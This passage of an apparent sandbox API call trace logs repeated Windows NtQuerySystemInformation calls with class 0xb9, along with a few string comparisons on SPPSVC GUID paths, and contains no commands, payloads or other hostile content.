NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca58, Length=0x50, ResultLength=0x0) [0269.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x38, ResultLength=0x0) [0269.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0269.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0269.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0269.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0269.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x28, ResultLength=0x0) [0269.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x38, ResultLength=0x0) [0269.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8a0, Length=0x28, ResultLength=0x0) [0269.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8a0, Length=0x28, ResultLength=0x0) [0269.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x38, ResultLength=0x0) [0269.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x20, ResultLength=0x0) [0269.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x20, ResultLength=0x0) [0269.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x20, ResultLength=0x0) [0269.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x20, ResultLength=0x0) [0269.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x38, ResultLength=0x0) [0269.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x20, ResultLength=0x0) [0269.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0269.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0269.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x50, ResultLength=0x0) [0269.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x38, ResultLength=0x0) [0269.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x28, ResultLength=0x0) [0269.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x28, ResultLength=0x0) [0269.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x28, ResultLength=0x0) [0269.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x28, ResultLength=0x0) [0269.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x28, ResultLength=0x0) [0269.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x38, ResultLength=0x0) [0269.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0269.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0269.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x38, ResultLength=0x0) [0269.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6b0, Length=0x20, ResultLength=0x0) [0269.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0269.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0269.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0269.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x38, ResultLength=0x0) [0269.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6b0, Length=0x20, ResultLength=0x0) [0269.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0269.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0269.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.467] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0269.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e8, Length=0x50, ResultLength=0x0) [0269.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0269.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6b0, Length=0x28, ResultLength=0x0) [0269.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0269.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0269.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0269.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0269.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0269.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0269.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0269.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0269.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0269.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0269.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0269.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x28, ResultLength=0x0) [0269.475] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0269.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0269.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0269.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0269.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0269.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x28, ResultLength=0x0) [0269.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x28, ResultLength=0x0) [0269.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x28, ResultLength=0x0) [0269.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca40, Length=0x28, ResultLength=0x0) [0269.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0269.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcac0, Length=0x28, ResultLength=0x0) [0269.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcac0, Length=0x28, ResultLength=0x0) [0269.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0269.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x20, ResultLength=0x0) [0269.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x20, ResultLength=0x0) [0269.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x20, ResultLength=0x0) [0269.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x20, ResultLength=0x0) [0269.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0269.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x20, ResultLength=0x0) [0269.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9b0, Length=0x20, ResultLength=0x0) [0269.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9b0, Length=0x20, ResultLength=0x0) [0269.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0269.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x28, ResultLength=0x0) [0269.483] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0269.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0269.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0269.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0269.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.484] NtQuerySystemInformation (SystemInformationClass=0xb9, 